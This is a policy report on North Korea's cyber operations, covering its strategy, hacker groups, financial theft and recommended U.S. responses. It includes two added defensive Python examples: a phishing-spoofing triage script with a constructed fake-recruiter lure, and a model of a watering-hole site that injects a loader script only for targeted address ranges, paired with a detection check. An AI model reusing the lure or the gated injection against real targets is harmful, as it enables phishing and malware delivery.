North Korean missiles and nuclear weapons have garnered fear, international condemnation, and tough sanctions. Pyongyang’s cyber activities, however, have elicited less reaction and punishment despite having been used repeatedly in attacks against governments, financial institutions, and industries.
The attitude of experts toward North Korea’s cyber capabilities was initially dismissive, just as their reaction to the regime’s nuclear and missile programs had been. Many, pointing to the famous nighttime satellite imagery of northeast Asia with a dark North Korea surrounded by the blazing lights of its neighbors, did not believe that the technologically backward regime was capable of sophisticated cyberattacks.
Nevertheless, although the regime fails to provide technological comforts for its populace, Pyongyang has developed cyber warfare capabilities surpassed by few nations. From initial rudimentary distributed denial-of-service (DDoS) attacks against South Korea, the regime improved its cyber programs to create a robust and global array of disruptive military, financial, and espionage capabilities.
As its cyber proficiencies evolved, Pyongyang implemented ever more sophisticated techniques and prioritized financial targets to evade international sanctions and augment the regime’s coffers for its nuclear and missile programs. Although it appears to have de-emphasized cyber operations against military and infrastructure targets in recent years, the regime previously alluded to attacking allied info-centric warfare strategies and civilian networks during a crisis.
The scope of North Korea’s demonstrated cyber capabilities and the severity of other recent cyberattacks, such as the Russian-sponsored SolarWinds supply-chain compromise, Chinese exploitation of Microsoft Exchange vulnerabilities, and the DarkSide ransomware attack that shut down the Colonial Pipeline, demonstrate the continued critical vulnerability of the government, financial, infrastructure, and corporate sectors. The United States, in conjunction with foreign governments and the private sector, needs to augment cyber defenses and respond more forcefully to attacks. Failure to do so enables North Korea to continue undermining the effectiveness of international sanctions and leaves the United States and its partners exposed to a potentially devastating cyberattack in the future.
Cyber: A Key Component of North Korean Strategy
Pyongyang has developed a comprehensive and sophisticated arsenal of cyberattack tools and methods. In 2017, senior U.S. intelligence officials assessed that North Korea was one of the top four cyber threats capable of launching “disruptive or destructive cyberattacks” against the United States. The Director of National Intelligence warned in January 2019 that North Korea “poses a significant cyber threat to financial institutions, remains a cyber-espionage threat, and retains the ability to conduct disruptive cyber attacks.”
North Korea’s cyber weapons and tactics are consistent with the regime’s asymmetric military strategy. As North Korea’s conventional military forces deteriorated in comparison with those of the United States and South Korea, Pyongyang developed new weapons to counter the growing gap in capabilities, including nuclear weapons, missiles, and long-range artillery.
After studying U.S. military operations in Iraq, North Korean leader Kim Jong-il concluded that allied high-tech warfare was vulnerable to cyberattacks and that “in the 21st century, war will be [fought as] information warfare.” Kim opined that “cyber attacks are like atomic bombs” and that “[w]ar is won and lost by who has greater access to the adversary’s military technical information in peacetime.”
North Korean strategists see cyberspace as an integral part of the regime’s military strategy, designating it “the fifth major battlefield” along with ground, air, sea, and space. By 2009, Kim declared that North Korea was “fully ready for any form of high-tech war.” The South Korean Ministry of Defense warned that North Korea was able to disrupt Global Positioning System (GPS) networks and was developing the means to jam high-tech missiles and precision-guided bombs.
Kim Jong-il initiated North Korea’s foray into cyber warfare, but it was during Kim Jong-un’s reign that Pyongyang accelerated and expanded its cyberattacks on a broader spectrum of targets. Since 2010, North Korea is believed to have jammed the GPS signals of aircraft near Incheon Airport; stopped the release of a major motion picture in the United States; hacked into South Korean banks, newspapers, and nuclear power plants; and defrauded banks and cryptocurrency exchanges to gain billions of dollars.
“With intensive information and communication technology, and the brave Reconnaissance General Bureau (RGB) with its [cyber] warriors,” Kim declared in 2013, “we can penetrate any sanctions for the construction of a strong and prosperous nation.” It is noteworthy that even then, Kim highlighted the financial sanctions–evading aspect of cyber operations.
Kim Jong-un declared that cyber warfare is a “magic weapon” and an “all-purpose sword that guarantees the North Korean People’s Armed Forces ruthless striking capability, along with nuclear weapons and missiles.” In the run-up to a crisis or as an alternative to kinetic strikes, the regime could conduct cyberattacks on government and civilian computer networks that control communications, finances, and infrastructure such as power plants and electrical grids.
Cybercrime: New Methods for Old Strategy
North Korea’s cyber operations are consistent not only with its asymmetric military strategy, but also with the regime’s long history of using criminal activities to acquire money. Earlier criminal efforts included counterfeiting of currencies, pharmaceutical drugs, and cigarettes; production and trafficking of illicit drugs, including opium and methamphetamines; trafficking in endangered species products; and insurance fraud.
Cybercrimes enable the North Korean regime to gain currency and evade international sanctions in ways that are more efficient, cost-effective, and lucrative than past illicit activities and more recent smuggling and ship-to-ship transfers of oil. The regime’s cybercrimes are global in scope, provide astronomical returns on investment, and are low-risk since they are difficult to detect and attribute with little likelihood of international retribution. There have been very few United Nations (U.N.) or U.S. sanctions imposed or legal actions taken against North Korean cyber groups. Cybercrime is especially beneficial to the regime as it faces the cumulative effects of international sanctions and the impact of self-imposed COVID restrictions on legal and illicit foreign trade, as well as natural disasters in the agricultural heartland and decades of devastating socialist economic policies.
Cybercrime Eclipsing Traditional Crimes. As the international community cracked down on North Korea’s various criminal endeavors, the beleaguered regime shifted toward new ways to gain money. Cyber operations are now a greater component of North Korean criminal activities than earlier, more traditional “bricks and mortar” endeavors such as counterfeiting and smuggling. North Korea’s hackers “have become the world’s leading bank robbers,” in the words of John Demers, head of the National Security Division of the U.S. Department of Justice. “Simply put, the regime has become a criminal syndicate with a flag, which harnesses its state resources to steal hundreds of millions of dollars.”
As with any criminal activity, it is difficult to assess how much North Korea has gained from its cybercrime operations. Governments, financial institutions, and law enforcement agencies may be unaware of some cybercrimes or unable to determine the perpetrator conclusively. Even with a successful cybercrime, North Korean hackers may not have been able to convert all of the cryptocurrency into hard cash, and some victimized financial institutions were able to recover some or all of their lost currency.
In August 2019, the U.N. Panel of Experts estimated that North Korea had cumulatively gained $2 billion from cybercrime. For comparison, in 2019, North Korea legally imported $2.7 billion in assorted civilian merchandise, mostly from China, and its annual gross domestic product (GDP) was $29 billion.
A South Korean organization has estimated that North Korean cybercrimes generate an annual revenue of $860 million, but others assess that Pyongyang may gain $1 billion a year—a third of the value of the nation’s exports—from cyber heists. During 2017–2018, North Korea was estimated to account for 65 percent of the cryptocurrency stolen from exchanges worldwide. One regime hacking unit, the Lazarus Group, is assessed to have gained more than $1.75 billion worth of cryptocurrency.
In September 2018, a grand jury issued an indictment of North Korean cyber operative Park Jin-hyok for attempted cyber heists and extortions in Asia, Africa, North America, and South America totaling $1.3 billion during 2015–2018. In 2020, the U.S. Department of Justice declared that North Korean hacking of virtual currency exchanges and related money laundering “poses a grave threat to the security and integrity of the global financial system.”
North Korean Cyber Agencies
Pyongyang has an expansive array of government organizations and affiliated hacker groups conducting malicious cyber operations. Organizations appear to have specified missions, although missions also appear to overlap and to change over time. The shadowy nature of covert cyber groups, as well as fragmentary and conflicting information, makes a definitive understanding difficult.
The predominant government organizations for cyber operations are the Reconnaissance General Bureau and the General Staff Department. Both are subordinate to the State Affairs Commission, which is chaired by Kim Jong-un, and have numerous subordinate units. Other government units include the State Security Department and the Defense Commission.
In addition to government agencies, numerous affiliated North Korean hacker groups conduct attacks against government, financial, infrastructure, and other sectors. These groups include:
- The Chollima groups;
- Dark Hotel;
- Group 123;
- The Kimsuky group (also tracked as Thallium);
- Lazarus (also known as APT38); and
- Reaper (also known as APT37).
The U.S. government refers to the North Korean government’s malicious cyber activity collectively as Hidden Cobra.
North Korea’s Illicit Cyber Operations
Cyber operations provide new methods and tools that Pyongyang can use to fulfill its long-standing objectives of espionage, disruptive and destructive operations, extortion and terrorism, illicit money-making activities, and evasion of sanctions. North Korean hackers have penetrated computer networks to:
- Collect intelligence on and steal secrets from defense, military technology, intelligence, financial, nuclear, and pharmaceutical targets;
- Disrupt computer systems through DDoS attacks and damage or destroy them with data-wiping malware;
- Deploy ransomware to encrypt data or files to hold computer systems hostage until extortion payments or other demands were met, sometimes in conjunction with violent physical attacks, as well as running cyber protection rackets whereby North Korean cyber groups will refrain from attacking entities in return for payment;
- Retaliate against opponents of the regime or those who demean North Korean leaders; and
- Illegally acquire and launder stolen money to evade sanctions and raise funds for the cash-strapped regime by cyberattacking banks, financial institutions, cryptocurrency exchanges, and the SWIFT (Society for Worldwide Interbank Financial Telecommunication) network.
Tactics, Techniques, and Procedures
North Korean hackers are adept at developing sophisticated malware and intrusion tooling that can gain access even to well-protected government, military, and financial computer networks. They are also astute at exploiting human vulnerabilities through social engineering, tricking victims into opening or installing malware that compromises network security.
Hackers seek access in much the same way that intelligence agencies recruit human assets. Like intelligence agencies, they ascertain the information and organizations that would achieve government-directed objectives, conduct reconnaissance to identify individuals that could provide access to that information, assess vulnerabilities and the means by which to exploit them, and determine which methods they can use to exfiltrate the data.
North Korea often delivers malware through spear-phishing emails targeted at people who can provide either direct or indirect access to a target network. While many of these attempts are variants on “please click on the (infected) attachment,” the means employed to allay the target’s suspicions have become increasingly clever. The hackers use “spoofing” tactics to disguise an email, social media account, or website so that it appears to come from a recognized, reliable source, so that the target will unwittingly install malware. The approaches are often individually customized and highly profiled, using personal information either about the target or about individuals or organizations that the target would trust. Because a sender’s display name and address are trivial to forge, a familiar name is no evidence of origin; only sender authentication (SPF, DKIM, and DMARC) and out-of-band confirmation are.
In Operations Dream Job, In(ter)ception, North Star, and WannaJob, North Korea targeted Australian, Indian, Israeli, Russian, South Korean, and U.S. defense and aerospace experts to gain classified or proprietary information by using fake job offers from defense contractors as lures to install data-gathering implants on the victims’ systems. The cyber groups impersonated job recruiters by creating fictitious WhatsApp, Facebook, and LinkedIn profiles of legitimate companies and even conducted extensive dialogue through email and phone calls.
Similar techniques were used against employees of banks, companies, and other organizations to gain access to computer networks. North Korean groups will mimic colleagues, friends, journalists, or Korea-related organizations to gain access to a victim’s computer and then use acquired information or contact lists to conduct follow-on approaches. The groups have even commissioned experts to write papers that were then used as bait when targeting other experts.
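The recruiter and colleague impersonation described above relies on the recipient trusting what the From line says. The following triage routine is an added example (not code from the original report or from any vendor it cites) showing the checks a mail-security team would run on such a message: lookalike sender domains, an address hidden in the display name, Reply-To and envelope-sender diversion, a failed DMARC verdict, and a macro-enabled attachment. The two messages, the trusted-domain list and the lookalike domains are constructed for the example.

```python
"""Triage an inbound message for the spoofing patterns described above.
Added example: the messages, domains and trusted-domain list are constructed."""
import email
import re
from email import policy
from email.utils import parseaddr
from pathlib import PurePosixPath

# Assumption: domains the recipient's organization actually trusts.
TRUSTED_DOMAINS = {"example-defense.com", "partnerbank.example"}
# Attachment types that execute code when opened (macro documents, scripts, shortcuts).
RISKY_EXTENSIONS = {".exe", ".scr", ".js", ".vbs", ".hta", ".lnk", ".iso", ".docm", ".xlsm"}


def normalize(domain: str) -> str:
    """Fold common lookalike substitutions (examp1e -> example, rn -> m)."""
    d = domain.lower()
    for fake, real in (("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"), ("rn", "m"), ("vv", "w")):
        d = d.replace(fake, real)
    return d


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch typo-squats such as example-defence.com."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(domain: str):
    """Return the trusted domain this sender domain imitates, or None."""
    d = domain.lower()
    if d in TRUSTED_DOMAINS or any(d.endswith("." + t) for t in TRUSTED_DOMAINS):
        return None  # the trusted domain itself or a genuine subdomain of it
    for trusted in TRUSTED_DOMAINS:
        # trusted name embedded in a longer domain, or within two edits after normalizing
        if trusted in d or edit_distance(normalize(d), normalize(trusted)) <= 2:
            return trusted
    return None


def auth_results(msg) -> dict:
    """Collect spf/dkim/dmarc verdicts from Authentication-Results headers added by the receiving MTA."""
    verdicts = {}
    for header in msg.get_all("Authentication-Results", []):
        for method, verdict in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", str(header), re.I):
            verdicts[method.lower()] = verdict.lower()
    return verdicts


def domain_of(header_value) -> str:
    return parseaddr(str(header_value))[1].rpartition("@")[2].lower()


def triage(raw: bytes) -> list:
    """Return (code, detail) findings; an empty list means no spoofing indicator fired."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    display_name, from_addr = parseaddr(str(msg.get("From", "")))
    from_domain = from_addr.rpartition("@")[2].lower()

    target = lookalike_of(from_domain)
    if target:
        findings.append(("lookalike-domain", f"{from_domain} imitates {target}"))
    if "@" in display_name:  # "hr@trusted.com" <someone@elsewhere>: the name is not the address
        findings.append(("display-name-address", display_name))
    reply_domain = domain_of(msg.get("Reply-To", ""))
    if reply_domain and reply_domain != from_domain:
        findings.append(("reply-to-mismatch", reply_domain))
    envelope_domain = domain_of(msg.get("Return-Path", ""))
    if envelope_domain and envelope_domain != from_domain:
        findings.append(("return-path-mismatch", envelope_domain))
    dmarc = auth_results(msg).get("dmarc", "none")
    if dmarc != "pass":  # the From domain did not authenticate; the display name proves nothing
        findings.append(("dmarc-not-pass", dmarc))
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if PurePosixPath(name).suffix.lower() in RISKY_EXTENSIONS:
            findings.append(("risky-attachment", name))
    return findings


# Constructed sample: a fake-recruiter lure of the kind described in the text.
SPOOFED_MESSAGE = b"""Return-Path: <bounce@mailer.attacker.example>
Authentication-Results: mx.victim.example; spf=pass smtp.mailfrom=mailer.attacker.example; dkim=none; dmarc=fail header.from=examp1e-defense.com
From: "hr@example-defense.com" <recruiting@examp1e-defense.com>
Reply-To: recruiting-team@webmail-lookalike.example
To: engineer@victim.example
Subject: Senior engineer opening: job description attached
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please review the attached description before our call.
--b1
Content-Type: application/octet-stream; name="Job_Description.docm"
Content-Disposition: attachment; filename="Job_Description.docm"
Content-Transfer-Encoding: base64

AAAA
--b1--
"""

# Constructed sample: a genuine message from the trusted domain that authenticates.
LEGITIMATE_MESSAGE = b"""Return-Path: <hr@example-defense.com>
Authentication-Results: mx.victim.example; spf=pass smtp.mailfrom=example-defense.com; dkim=pass header.d=example-defense.com; dmarc=pass header.from=example-defense.com
From: HR Recruiting <hr@example-defense.com>
To: engineer@victim.example
Subject: Interview schedule
Content-Type: text/plain

Your interview is at 10:00.
"""

if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED_MESSAGE), ("legitimate", LEGITIMATE_MESSAGE)):
        print(label, triage(raw))
```

The DMARC check depends on the receiving mail server having added an Authentication-Results header it trusts; an attacker can forge that header too, so a gateway must strip any copy that arrives from outside before its own evaluation runs. The lookalike check is deliberately crude (two edits after folding common substitutions); in production it would run against the organization's full partner list and the registered domain, not the whole host name.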
Hackers and intelligence agencies also welcome targets that offer themselves as sources. A “walk-in” intelligence source walks into an embassy or otherwise contacts a government source to volunteer his or her services without having been previously targeted. Hackers conduct “watering hole” attacks by either infecting or creating websites that potential sources are likely to visit.
The hackers can create infected documents or links and wait for someone to arrive and unknowingly take the bait. In 2017, North Korean hackers infected the website of the Polish Financial Supervision Authority with malware that was programmed to download to computers that visited the site only if they were from 104 preselected financial institutions and telecommunications companies.
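Delivering the payload only to visitors from preselected institutions has a practical consequence for defenders: a scanner or sandbox that fetches the page from an unrelated address sees a clean site. The block below is an added example (not code from the original report, and not taken from the 2017 incident) that models that gating with a constructed target list and shows the vantage-point comparison a security team can use to expose it. The address ranges, page content and loader URL are all constructed; `serve` stands in for an HTTP fetch from a given source address.

```python
"""Model of the selective delivery described above, and a vantage-point check
that catches it. Added example: the address ranges, the page and the injected
loader URL are constructed, not taken from the 2017 incident."""
import ipaddress
from html.parser import HTMLParser

# Assumption: ranges the attacker pre-selected (addresses of the targeted institutions).
TARGET_NETWORKS = [ipaddress.ip_network(n) for n in ("203.0.113.0/24", "198.51.100.128/25")]

CLEAN_PAGE = ("<html><head><title>Supervisory notices</title></head>"
              "<body><p>Public notices for regulated entities.</p></body></html>")
# Constructed loader tag; a real one pulls a second-stage script from attacker infrastructure.
LOADER_TAG = '<script src="https://static-cdn.example/jquery.min.js"></script>'


def serve(client_ip: str) -> str:
    """The compromised site as the attacker modified it: only pre-selected
    source addresses receive the page with the loader injected."""
    ip = ipaddress.ip_address(client_ip)
    if any(ip in net for net in TARGET_NETWORKS):
        return CLEAN_PAGE.replace("</head>", LOADER_TAG + "</head>")
    return CLEAN_PAGE


class ScriptSources(HTMLParser):
    """Collect external script URLs from a page."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)


def script_sources(page: str) -> set:
    parser = ScriptSources()
    parser.feed(page)
    return set(parser.sources)


def compare_vantage_points(fetch, source_ips) -> dict:
    """Fetch the same page from several source addresses and report scripts that
    appear from some vantage points but not all. Returns {source_ip: [extra script URLs]}."""
    seen = {ip: script_sources(fetch(ip)) for ip in source_ips}
    common = set.intersection(*seen.values())
    return {ip: sorted(srcs - common) for ip, srcs in seen.items() if srcs - common}


if __name__ == "__main__":
    # A scanner that only ever fetches from an outside range sees nothing.
    print(compare_vantage_points(serve, ["192.0.2.10", "192.0.2.11"]))
    # Adding a fetch from the institution's own egress address reveals the loader.
    print(compare_vantage_points(serve, ["192.0.2.10", "203.0.113.45"]))
```

In practice `fetch` would issue the request through a proxy or host inside each institution's address space, and the comparison would also cover inline scripts and redirects, since the gating can be applied at any of those points.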
Once a source has provided access, the available information, including information on possible access to other potential targets, is investigated and vetted for its usefulness. North Korean hackers may spend nine to 18 months conducting reconnaissance, elevating user privileges, and disabling security procedures before attempting to execute a cybertheft. North Korean hackers are seen as unique in their willingness to destroy large amounts of data to cover their tracks or distract targets while a theft is in process.
North Korea’s Evolving Cyber Operations
Pyongyang’s cyberattacks developed through several phases. Initially, the regime focused on cyber espionage to steal information and cyberattacks to disrupt or destabilize networks related to national defense, nuclear power plants, infrastructure, telecommunications, media, and corporations. Early cyber operations were a form of “reconnaissance by fire” to test preliminary capabilities against opponents’ defenses and may have served as proof of concept for far more extensive and crippling operations to be used in a time of military conflict or major crisis.
As North Korea improved the scope, scale, and sophistication of its cyber operations, it progressed through phases of cyberterrorism, revenge attacks, and extortion; cyber bank robbery; cryptocurrency exchanges and decentralized finance (DeFi) platforms; and (after the onset of COVID) pharmaceutical companies. The initiation of a new phase did not curtail cyberattacks prevalent in previous phases, although their scope and prioritization might have changed. For example, cyberespionage operations continued after Pyongyang initiated cybercriminal activities to generate revenue.
In 2015, North Korea began cyber robbery operations to gain revenue for the beleaguered, heavily sanctioned regime. Pyongyang began with attacks against traditional financial institutions such as banks, fraudulent forced interbank transfers, and automated teller machine (ATM) thefts. After the international community took notice of these attacks, the regime shifted to targeting cryptocurrency exchanges. By 2020, according to one U.N. member state, North Korean “attacks against virtual currency exchange houses [had] produced more illicit proceeds than attacks against financial institutions” with stronger cyber protections.
Potential North Korean Cyber Actions During a Crisis
North Korea has proven to be adept at deeply penetrating even highly secure computer networks of governments, militaries, banks and international financial transaction systems, and critical infrastructure targets. More worrisome, however, is the possibility that Pyongyang could inflict even greater damage during a crisis or hostilities on the Korean Peninsula. The intrusions documented above indicate that Pyongyang has the potential to engage in cyber warfare with disproportionately massive impact—in other words, to create a cyber 9/11.
North Korea could paralyze critical infrastructure systems such as communications, dams, electrical grids, hospitals, nuclear power plants, supply chains, and traffic-control systems. North Korean hackers have targeted railroad companies and airlines, including an automated operating system that controls trains’ speed. Hackers have already jammed airline GPS signals and might seek to gain control of airplane controls.
In 2013, South Korea’s National Intelligence Service (NIS) revealed that Pyongyang had developed a Trojan program to take over computer networks and power supply systems, chemical materials facilities, oil storage terminals, water treatment stations, and subway networks throughout South Korea. The NIS indicated that the regime had recorded the geographic coordinates of South Korean chemical materials facilities, oil storage terminals, water treatment stations, and power plants and that it had collected information on power substations, subway networks and elevated roadways in major cities, tunnels, bridges, and railroad stations.
In 2017, North Korea attempted to use spear-phishing emails to gain entry into U.S. electric companies as an early-stage reconnaissance operation. Computer security firm FireEye reported that the hackers failed to gain access at that time to computer systems or industrial control systems that regulate the supply of power. Nevertheless, the U.S. government has warned that North Korea’s illicit cyber activities “threaten the United States and the broader international community and, in particular, pose a significant threat to the integrity and stability of the international financial system,” in addition to which “[t]he DPRK has the capability to conduct disruptive or destructive cyber activities affecting U.S. critical infrastructure.”
Pyongyang could engage in economic warfare to steal massive amounts of money or undermine the stability of the international financial system or worldwide markets. The regime could conduct ransomware attacks on banks to gain money or to disable or destroy computer networks as well as flood the SWIFT system with fraudulent transactions. In 2019, more than 11,000 SWIFT member institutions worldwide sent approximately 33.6 million transactions per day through the network.
What the United States Should Do
North Korean cyber operations are a strategic threat to the United States, its partners, and the international financial network. Pyongyang’s cybercrimes provide a means to evade sanctions and undermine international efforts to curtail the regime’s prohibited nuclear and missile programs.
Washington needs to make addressing this threat a national priority by establishing a comprehensive whole-of-government strategy, to be coordinated with other governments as well as the private sector. The U.S. should fully enforce existing laws and assess whether additional legislative and executive actions are needed, including enhanced regulation of cryptocurrency exchanges and DeFi platforms. Washington should determine a range of punitive steps, both cyber and kinetic, for responding to attacks deemed detrimental to national security.
Specifically, Washington should:
Assess the threat. The Director of National Intelligence should prepare classified and unclassified National Intelligence Estimates defining the extent of North Korean cyber capabilities, past attacks, and the potentially greater threat from future operations, including during a crisis or hostilities on the Korean Peninsula. These reports should be submitted to appropriate committees in Congress.
The U.S. should also continue to issue threat advisories that provide technical details of North Korean cyber organizations, recent cyberattacks, the techniques used to evade cyber defenses, and money-laundering methods in order to alert government and private-sector entities to take appropriate actions to improve cyber defenses. Widespread public dissemination of threat information and private contacts with other governments as well as banks, financial institutions, and companies enable the sharing of more detailed information while still protecting classified sources and methods.
Create a comprehensive national strategy to combat cyber threats. Addressing North Korea’s cyber threat should be a national priority that requires a comprehensive whole-of-government response that uses all of the instruments of national power. Given the expansive nature of Pyongyang’s cyber operations, the effort should be directed by the White House and should include, at a minimum, the Departments of Treasury, Justice, Defense, Commerce, and Homeland Security as well as the Intelligence Community.
It is encouraging that the 2021 National Defense Authorization Act created the position of National Cyber Director to serve as principal adviser to the President on cyber policy. Chris Inglis, a 28-year veteran of the National Security Agency, was confirmed in June 2021 to lead coordination of U.S. cybersecurity policy and strategy implementation; oversee efforts to increase cybersecurity and deter malicious cyber activity; coordinate the federal response to cyberattacks; engage with the private sector; engage in diplomatic efforts to develop norms of and international consensus on responsible state cyber behavior; and support “the integration of defensive cyber plans and capabilities with offensive cyber plans.” Also encouraging was President Biden’s announcement that he would “make cybersecurity a top priority at every level of government…further strengthen partnerships with the private sector, and expand our investment in the infrastructure and people we need to defend against malicious cyberattacks.”
However, questions remain with respect to how the National Cyber Director will interact with other senior officials and organizations with direct or indirect cyber responsibilities. Who will have the clout to direct a coherent, comprehensive policy across vast bureaucratic organizations with overlapping responsibilities and conflicting priorities? Without real authority over departments and agencies, the new cyber director could face some of the same problems that plagued the Director of National Intelligence, whose position was created after the 9/11 attack. If bureaucratic turf battles and inertia are to be overcome, the President will have to make clear who has real authority on cyber policy, particularly as it interacts with national security, economic, and law enforcement policies.
Coordinate with the private sector. Extensive sharing of cyber-threat information among and between the public and private sectors is critical for improving defenses against North Korean and other hackers. Collaboration and coordination enable a more comprehensive assessment of weaknesses in government, industry, business, financial, and infrastructure computer networks as well as proposals for innovative technical or methodological fixes. In conjunction with industry, businesses, and financial institutions, Washington should therefore develop, coordinate, and promulgate cyber rules, regulations, security protocols, and best practices to improve cybersecurity and the resilience of networks.
The Cybersecurity Information Sharing Act authorized the Department of Homeland Security to “encourage robust sharing of useful cybersecurity information among all types of entities—private, Federal, state, local, territorial, and tribal.” The new Office of the National Cyber Director will join existing government bodies in engaging with the private sector, and this will increase the potential for competition, confusion, and industry frustration. Care should be taken to delineate responsibilities among government agencies.
Despite all actions that governments, industries, and banks implement, the weak link will still be the individual employee who inadvertently allows malware into the system. No matter how strong the castle’s defenses are, one person carelessly allowing the drawbridge to drop down undermines all defenses. With that in mind, organizations should deploy technical measures that preclude or reduce the execution of malware even after a user has been deceived, such as blocking macro-enabled and executable attachments, detonating attachments in a sandbox before delivery, and requiring phishing-resistant multifactor authentication so that a stolen password alone does not yield access. Preventing North Korean cyber intrusions will require both improved technical defenses and effective measures to thwart the regime’s sophisticated social engineering techniques that induce individuals to run malware unknowingly on computer systems.
Engage international partners. U.S. defenses are only as strong as the weakest link overseas. The U.S. should continue and expand efforts to coordinate with foreign governments, law enforcement agencies, and financial regulatory agencies at the national level and, through them, regional and domestic partners. There should also be engagement with foreign financial institutions and businesses to disseminate information on North Korean cyber hacking and money-laundering tactics, techniques, and procedures.
The United States should take the lead in multiple fora to establish and ensure compliance with international cybersecurity standards. Such efforts could take place in existing diplomatic entities, such as the United Nations or G20 forum, led by the White House or State Department, as well as with financial and law enforcement organizations.
The U.N. Panel of Experts recommended that financial institutions, including banks and cryptocurrency exchanges, enhance cyber defenses by sharing threat information and best practices through organizations such as the Financial Services Information Sharing and Analysis Center. The Treasury Department’s Office of Foreign Assets Control (OFAC) could take the lead on encouraging and facilitating information sharing among law enforcement and financial institutions. The initiative could be modeled on the FinCEN Exchange program of the Treasury Department’s Financial Crimes Enforcement Network (FinCEN), which shares information on priority illicit finance threats with financial institutions.
Washington should ensure that financial entities either fully comply with existing regulations or risk losing their access to the SWIFT financial transaction network or ability to maintain correspondent accounts in the U.S. financial system.
Given the United States’ extensive intelligence collection capabilities and law enforcement expertise, Washington should dispatch teams overseas to engage with foreign government, law enforcement, financial institutions, and private-sector entities to provide targeted information on North Korean cyber programs. The U.S. did this extensively to counter North Korean evasion of sanctions. Those efforts successfully alerted entities that were unaware of North Korean activities and triggered compliance prior to the issuing of formal U.S. punitive measures.
Fully enforce laws against illicit activities and cyber operations. Despite the severity of Pyongyang’s cyberattacks, the U.S. government has taken action only against a handful of North Korean actors. Unfortunately, this is consistent with actions by successive U.S. Administrations to limit law enforcement efforts against North Korean, Chinese, and other entities that violate U.S. laws and U.N. resolutions. The U.S. government should take action against North Korean hackers as well as countries that enable them to operate from their soil or that provide technology, equipment, or training. This can be done by:
- Fully resourcing the sanctions enforcement effort by dedicating sufficient investigative and enforcement effort to it;
- Fully enforcing FinCEN regulations that are applicable to cryptocurrency transactions by U.S. nationals or within the United States;
- Prohibiting transactions by U.S. nationals or within the U.S. that involve cryptocurrencies the anonymity of which has facilitated illicit transactions on behalf of North Korea;
- Amending the North Korea Sanctions and Policy Enhancement Act of 2016 to ban transactions in proceeds derived from cryptocurrency that constitute the proceeds of illicit activity or were involved in carrying out illicit activity; and
- Putting greater pressure on host nations to expel or extradite North Korean hackers, including terminating the U.S. Department of Commerce technology export licenses of nations that fail to do so.
Stronger action could constrain North Korea’s ability to gain funding for its prohibited nuclear and missile programs. The Departments of Treasury and Justice should target banks, financial institutions, and front companies that are used to launder money stolen by North Korea. In 2017, the U.S. Congress sent the Trump White House a list of 12 Chinese banks that were believed to be committing money-laundering crimes in the U.S. financial system. To date, the executive branch has taken no action. In the past, the U.S. imposed $8 billion–$9 billion in fines on European banks that laundered money for Iran, but it has yet to impose any fines on Chinese banks that launder money for North Korea.
Justice Department actions against some North Koreans revealed the extent to which they had moved money illicitly through nine different Chinese banks. The Treasury Department should engage with those banks to discern whether they unwittingly facilitated financial crimes, in which case they should be subject to remedial actions, or were complicit, in which case they should be fined, designated as primary money-laundering concerns under Section 311 of the USA PATRIOT Act, and denied access to the U.S. financial system. The Bank Secrecy Act, Section 312 of the USA PATRIOT Act, and other U.S. regulations require U.S. financial institutions to take anti–money laundering measures to ensure that correspondent bank accounts of foreign entities are not used for money-laundering purposes in U.S. financial institutions.
In January 2021, Congress enacted the National Defense Authorization Act for fiscal 2021, which includes the Anti-Money Laundering Act of 2020. The statute updates U.S. anti-money laundering laws, significantly expands the U.S. government’s authority to subpoena documents held by foreign banks overseas, and codifies a $50,000 daily fine for failing to comply with subpoenas. The act also preserves the government’s ability to terminate foreign correspondent accounts in the U.S. financial system, which is a financial “death penalty” for foreign banks that do not comply.
Augment regulation of cryptocurrency exchanges. As banks and financial institutions responded to North Korean cyberattacks, Pyongyang shifted toward cryptocurrency exchanges and DeFis both as targets and as means to launder money. The U.S., in conjunction with other nations, should review existing legislation and regulations that are applicable to cryptocurrency exchanges to ensure sufficient security against cyberattacks and prevent money-laundering.
The U.N. Panel of Experts recommended that member states should implement Financial Action Task Force standards and “that to manage and mitigate the risks emerging from virtual assets,” such assets should be subject to enhanced monitoring and compliance standards. The United States could augment its technical warning notices to include increased emphasis on identifying North Korean attacks, specific actors and their virtual coin “wallets,” and techniques used against cryptocurrency exchanges.
Determine U.S. responses to North Korean cyberattacks. The potential for greater and even catastrophic North Korean cyberattacks against the United States, its partners, and the international financial system raises questions about the proper levels of retaliatory or even preemptive actions against the regime. “[A] good defense isn’t enough,” President Biden has commented; “we need to disrupt and deter our adversaries from undertaking significant cyberattacks in the first place. We will do that by, among other things, imposing substantial costs on those responsible for such malicious attacks, including in coordination with our allies and partners.”
Given North Korea’s limited exposure to cyberattacks, a U.S. or international response would also need to consider non-cyber tools of national power. These include “diplomatic action, cooperation reduction, visa restriction, financial sanctions, legal action, and military action. A consistent pattern of imposing meaningful costs for malicious cyber behavior will strengthen our cyber deterrence if applied consistently, and in some cases, publicly.” A military response to a non-military cyberattack would be a difficult decision, particularly given the difficulty of conclusively assigning blame for cyber operations. In 2014, however, NATO leaders agreed that a large-scale cyberattack on a member country would be considered an attack on the entire alliance, potentially leading to the invocation of Article 5 and triggering a military response. Similarly, the United States and Japan agreed in 2019 that in certain circumstances, a cyberattack could constitute an armed attack for the purposes of Article V of the U.S.–Japan Security Treaty.
The United States should consider discussing with other U.N. member nations whether future North Korean cyberattacks should merit a U.N. Security Council resolution and accompanying sanctions, such as those imposed in response to the regime’s nuclear and missile tests. North Korean cyber groups that commit cybercrimes to evade sanctions and gain funding for the regime’s prohibited nuclear and missile programs could be sanctioned under existing resolutions.
